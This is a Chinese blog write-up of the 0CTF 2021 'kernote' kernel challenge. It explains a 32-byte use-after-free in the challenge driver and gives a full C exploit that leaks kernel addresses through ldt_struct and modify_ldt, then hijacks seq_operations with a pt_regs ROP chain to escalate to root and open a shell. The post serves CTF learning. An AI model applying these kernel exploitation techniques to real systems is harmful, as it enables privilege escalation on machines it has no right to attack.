【ldt_struct】0ctf2021-kernote

已于 2023-10-04 23:45:29 修改
阅读量196 收藏
点赞数
分类专栏: # kernel-pwn 文章标签: kernel-pwn
于 2023-10-04 23:41:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61670993/article/details/133563905
版权

前言 

题目给的文件系统是 ext4,所以我们只需要将其挂载即可使用:

1、创建一个空目录

2、使用 mount 将其挂载即可

3、使用 umount 卸载即可完成打包

开启了 smap、smep、kaslr 和 kpti 保护,并且给了如下内核编译选项:

Here are some kernel config options in case you need it
```
CONFIG_SLAB=y
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_HARDENED_USERCOPY=y
CONFIG_STATIC_USERMODEHELPER=y
CONFIG_STATIC_USERMODEHELPER_PATH=""
```

可以看到这里使用的是 slab 分配器而不是默认的 slub 分配器:

  • 开启了 Random Freelist(slab 的 freelist 会进行一定的随机化)
  • 开启了 Hardened Freelist(slab 的 freelist 中的 object 的 next 指针会与一个 cookie 进行异或(参照 glibc 的 safe-linking))
  • 开启了 Hardened Usercopy(在向内核拷贝数据时会进行检查,检查地址是否存在、是否在堆栈中、是否为 slab 中 object、是否非内核 .text 段内地址等等
  • 开启了 Static Usermodehelper Path(modprobe_path 为只读,不可修改)

 漏洞利用

驱动程序比较简单,就一个 ioctl 函数,实现了四个功能,给了一个 32 字节大小的 UAF,并且有写 8 字节的能力。

漏洞的产生在于在释放了 buf[idx] 时,虽然将其置零了,但是我们可以通过 note 继续操作释放的堆块,这里就导致了 UAF。

这里需要注意的是本题使用的是 slab 分配器,其最小的堆块大小就是 32 字节了,所以这里的 ldt_struct 也是会分配到 32 字节的 object,所以这里选择 ldt_struct 泄漏内核基地址,然后再劫持 seq_operations,利用 pt_regs 一套带走。

exp 如下:

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <asm/ldt.h>
#include <sys/shm.h>
#include <sys/wait.h>

#define SECONDARY_STARTUP_64 0xffffffff81000040

size_t pop_rdi = 0xffffffff81075c4c; // pop rdi ; ret
size_t init_cred = 0xffffffff8266b780;
size_t commit_creds = 0xffffffff810c9dd0;
size_t add_rsp_xx = 0xFFFFFFFF81A1B270;
size_t swapgs_kpti = 0xFFFFFFFF81C00FB8;

int seq_fd;
char buffer[8];

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* bind the process to specific core */
void bind_core(int core)
{
    cpu_set_t cpu_set;

    CPU_ZERO(&cpu_set);
    CPU_SET(core, &cpu_set);
    sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

    printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

int fd;
void add(size_t idx)
{
        ioctl(fd, 0x6667, idx);
}

void dele(size_t idx)
{
        ioctl(fd, 0x6668, idx);
}

void note_get(size_t idx)
{
        ioctl(fd, 0x6666, idx);
}

void note_write(size_t data)
{
        ioctl(fd, 0x6669, data);
}



int main(int argc, char** argv, char** env)
{
        bind_core(0);
        int res;
        int pipe_fd[2];
        size_t* buf;
        size_t temp;
        size_t page_offset_base;
        size_t search_addr;
        size_t kernel_offset;
        struct user_desc desc = { 0 };

        fd = open("/dev/kernote", O_RDWR);
        if (fd < 0) err_exit("Failed to open /dev/kernote");

        add(0);
        note_get(0);
        dele(0);

        page_offset_base = 0xffff888000000000;
        desc.base_addr = 0xff0000;
        desc.entry_number = 0x8000 / 8;
        syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));
        while (1)
        {
                note_write(page_offset_base);
                res = syscall(SYS_modify_ldt, 0, &temp, 8);
                if (res > 0) break;
                else if (res == 0) err_exit("Error in leak page_offset_base by ldt_struct");
                page_offset_base += 0x4000000;
        }
        hexx("page_offset_base", page_offset_base);

        pipe(pipe_fd);
        buf = malloc(0x1000*sizeof(size_t));
        kernel_offset = -1;
        search_addr = page_offset_base;
        while (1)
        {
                note_write(search_addr);
                if (!fork())
                {
                        res = syscall(SYS_modify_ldt, 0, buf, 0x8000);
                        for (int i = 0; i < 0x1000; i++)
                                if (buf[i] > 0xffffffff81000000 && (buf[i]&0xfff) == 0x040)
                                {
                                        kernel_offset = buf[i] - SECONDARY_STARTUP_64;
                                        break;
                                }
                        write(pipe_fd[1], &kernel_offset, 8);
                        exit(0);
                }
                wait(NULL);
                read(pipe_fd[0], &kernel_offset, 8);
                if (kernel_offset != -1) break;
                search_addr += 0x8000;
        }
        hexx("kernel_offset", kernel_offset);

        pop_rdi += kernel_offset;
        init_cred += kernel_offset;
        commit_creds += kernel_offset;
        swapgs_kpti += kernel_offset;
        add_rsp_xx += kernel_offset;
        hexx("add_rsp_xx", add_rsp_xx);

        add(1);
        note_get(1);
        dele(1);

        seq_fd = open("/proc/self/stat", O_RDONLY);
        if (seq_fd < 0) err_exit("Failed to open /proc/self/stat");
        note_write(add_rsp_xx);

        asm(
        "mov r15, pop_rdi;"
        "mov r14, init_cred;"
        "mov r13, commit_creds;"
        "mov r12, swapgs_kpti;"
        "xor rax, rax;"
        "mov rdi, seq_fd;"
        "mov rsi, buffer;"
        "mov rdx, 8;"
        "syscall;"
        );

        hexx("UID", getuid());
        system("/bin/sh");

        return 0;
}

 效果如下:

彩蛋

这里调试时,又无法在 seq_operations->start 这里断住,思考了好久,最后想到了,seq_operations->start 是在 seq_read_iter 中被调用的,所以直接把断点打在 seq_read_iter 这里,然后再跟几步就可以跟到 seq_operations_start 了。以后就直接这样调试了

其实我们要注意栈回溯,如果断点断不下来,我们可以往前回溯,然后跟几步就 ok 了

参考:【CTF.0x05】TCTF2021-FINAL 两道 kernel pwn 题解 - arttnba3's blog

XiaozaYa
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
新版客户端临时修复补丁_LDT_
09-28
"新版客户端临时修复补丁_LDT_"是针对Latale游戏客户端的一个更新,主要目的是解决现有版本中的一些问题或者增强用户体验。LDT可能是开发团队的缩写,也可能是项目代号,它标识了这个补丁的归属。 Latale是一款网络...
Robust_LDT_dane
03-19
标题“Robust_LDT_dane”可能指的是一个与鲁棒线性决策树(Robust Linear Decision Trees, LDTs)相关的项目或数据集。在Python编程环境中,这种类型的模型通常用于处理具有噪声或异常值的数据,以提高预测的稳定性...
debuuf.zip_LDT修改器_SPF解包_latale Extractor_spf打包工具_登录
09-24
这里提到的"debuuf.zip"文件包含了一系列与特定游戏或应用程序相关的工具,主要用于处理LDT(可能是一种数据格式)和SPF文件。下面将详细解释这些概念以及它们在IT领域的应用。 首先,"LDT修改器"是一个工具,它...
ldt.rar_V2
09-14
标题“ldt.rar_V2”指的是一个针对Linux操作系统内核版本2.13.6的更新或补丁,其中包含了处理32位和64位模式下调用的改进。这个压缩包包含两个文件:ldt.c和ldt.h,它们是C语言源代码文件,很可能用于定义和实现与...
ldt.rar_The Call
09-21
在Linux操作系统中,`modify_ldt`是一个系统调用,用于修改进程的本地描述符表(Local Descriptor Table,简称LDT)。LDT是x86架构中的一个关键组件,它在保护模式下运行的系统中起到重要作用。这篇文章将深入探讨`...
Arcmap天地图历史影像插件全国版-免费!免费!
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包
07-22
毕业设计javajsp网上服装商城管理系统ssh-qkrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 通过网上交易这个平台,我们足不出户就可以了解商品的信息和价格,不仅方便了用户也为用户节约了时间,系统的主要功能就是:商品类别管理、商品信息管理、订单管理、会员管理、系统公告管理等。分为管理员用户、会员用户这二种用户平台。 包含:源码、数据库脚本、论文、环境工具包、相同框架项目的安装教程(在说明文档中)
mysql安装配置教程
07-22
MySQL的安装和配置过程可能因操作系统和版本而异,但以下是一些通用的步骤,适用于大多数情况: ### Windows系统安装MySQL: 1. **下载MySQL Installer**: - 访问[MySQL官方网站](https://dev.mysql.com/downloads/installer/)下载MySQL Installer。 2. **启动MySQL Installer**: - 运行下载的安装程序。 3. **选择安装类型**: - 选择“Developer Default”安装类型,它包括MySQL Server和常用的开发工具。 4. **配置MySQL Server**: - 在“Server Instance Configuration”中,输入root用户的密码,并配置MySQL的安装路径。 5. **详细配置**: - 根据需要配置MySQL Server的详细设置,如字符集、默认存储引擎等。 6. **安装**: - 检查配置,然后点击“Execute”开始安装。 7. **安装完成**: -
文化娱乐-微博情感分析-含实验报告-约150行(分词、朴素贝叶斯模型).rar
07-22
数据可视化实例的python实现,可供学习了解
微信小程序+外卖小程序
07-22
微信小程序是一种不需要下载安装即可使用的应用,它实现了应用“触手可及”的梦想,用户扫一扫或搜一下即可打开应用,体现了“用完即走”的理念。 特点: 无需安装和卸载:用户可以直接使用,使用完直接关闭,不会占用桌面空间。 制作成本低:小程序开发门槛相对较低,难度不及APP,能够满足简单的基础应用需求。 内存小、运行快:小程序体积小,加载速度快,操作便利快捷。 容易部署,延展性强:小程序具有丰富的延展性,可以适应多种应用场景。
mysql安装配置教程.docx
最新发布
07-22
mysql安装配置教程
Qt5.12制作的库存管理系统
07-22
基于Qt512开发的商品库存管理系统,利用MySql构建库存管理数据库,设置有商品编号、名称、数量、单价、采购单位、负责人、入库时间、出库时间、备注的记录,使用ODBC数据源连接MySQL,在QT中编写程序,并制作了仓库管理系统的UI界面,利用QT设计师界面构建子界面,完成新增商品、商品入库、商品出库、删除商品、搜索商品、导出数据、商品汇总的功能,实现数据库与UI数据展示等同步。
跑步运动微信小程序.zip
07-22
跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 跑步运动微信小程序设计与实现源码+数据库(高分优秀毕业设计)个人经导师指导并认可通过的高分毕业设计项目,评审分98分。主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。
河道水面漂浮物视频数据集05
07-22
河道漂浮物数据集05,通过自己采集提供给大家使用,注意本数据集未标注。
洛谷+Hydro美化插件
07-22
洛谷 | 计算机科学教育新生态 + Hydro Online Judge两大在线系统 Chrome-based 浏览器插件。
无水印视频素材,可以用于剪辑,制作PPT等办公场景,唯美系列2个,星空系列1个,夜景系列1个,其他系列29个.rar
07-22
探索无限创意,用我们的无水印视频素材点亮您的作品!精选02款唯美系列视频,让您的剪辑更添艺术气息;1款星空系列,带您遨游浩瀚宇宙;1款夜景系列,捕捉城市之美;还有29款其他系列,满足您多样化的创作需求。这些高清素材,无论是用于专业剪辑还是制作精美的PPT,都能助您一臂之力,提升工作效率与视觉效果。无需担心版权问题,我们的素材纯净无痕,让您的创意自由飞翔。现在就加入我们,开启您的创意之旅,用这些高品质视频素材,打造独具匠心的作品吧!
点亮Delphi GUI开发:构建桌面应用的艺术
07-22
Delphi是一种高性能的集成开发环境(IDE)和面向对象的编程语言。它最初由Borland公司开发,后来随着Borland公司的变迁,Delphi的开发和维护权转交给了Embarcadero Technologies。Delphi主要使用Object Pascal语言,这是一种扩展的Pascal语言,增加了面向对象编程的特性。 ### 主要特点 1. **面向对象**:Delphi使用Object Pascal,支持类、对象、继承、封装和多态等面向对象编程特性。 2. **快速应用开发**:Delphi提供了丰富的VCL(Visual Component Library)组件库,使得开发者可以快速构建复杂的图形用户界面(GUI)。 3. **跨平台**:Delphi支持Windows、macOS和Linux等多个平台的开发。 4. **强大的数据库支持**:Delphi提供了对各种数据库的访问支持,包括SQL Server、Oracle、MySQL等。 5. **网络编程**:Delphi支持网络编程,可以开发客户端和服务器端的应用程序。 6. **安全性**:Delphi应用程
PP88-V5 (13).apk
07-22
PP88-V5 (13).apk
sklearn波士顿数据集
07-22
波士顿房价数据集是机器学习中非常知名的数据集,它被用于多篇回归算法研究的学术论文中,该数据集共计506条,其中包含有13个与房价相关的特征以及1个目标值(房价) 数据集读取教学 https://mp.csdn.net/mp_blog/creation/editor/140621359 CRIM per capita crime rate by town ZN proportion of residential land zoned for lots over 25,000 sq.ft. INDUS proportion of non-retail business acres per town CHAS Charles River dummy variable (= 1 if tract bounds river; 0 otherwise) NOX nitric oxides concentration (parts per 10 million) RM average number of rooms per AGE proportion of owner-occu
彩虹岛spf打包解包源码_ldt修改器
08-29
LDT修改器是指彩虹岛游戏中的一个工具,它可以对角色进行修改和定制。利用LDT修改器,玩家可以更改角色的外观、能力、装备等属性,满足自己的游戏需求。 所以,彩虹岛SPF打包解包源码和LDT修改器都是为了让玩家...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值